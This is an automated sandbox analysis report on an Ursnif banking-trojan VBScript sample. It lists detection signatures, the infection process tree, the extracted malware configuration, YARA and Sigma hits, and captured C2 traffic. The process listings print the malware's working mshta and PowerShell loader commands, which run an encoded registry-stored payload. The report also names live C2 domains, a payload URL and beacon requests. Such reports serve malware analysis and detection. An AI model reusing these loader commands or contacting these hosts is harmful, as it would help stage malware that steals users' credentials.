Play interactive tour

Edit tour

Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Sample Name:	2Q4tLHa5wbO1.vbs
Analysis ID:	321602
MD5:	afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:	1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:	7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Uses nslookup.exe to query domains

WScript reads language and country specific registry keys (likely country aware script)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

wscript.exe (PID: 4180 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

iexplore.exe (PID: 7092 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 7008 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4604 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 3484 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 4700 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

control.exe (PID: 6328 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4268 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 2216 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6632 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)

RuntimeBroker.exe (PID: 4772 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4660 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

rundll32.exe (PID: 6828 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6828	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 3656	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 6328	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 4604	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 22 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', ProcessId: 3484

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7008, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 4604

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', ProcessId: 3484

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6328, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6828

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Found malware configuration

Show sources

Source: explorer.exe.3424.30.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 12%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

Joe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking:

Found Tor onion address

Show sources

Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Show sources

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmp	String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

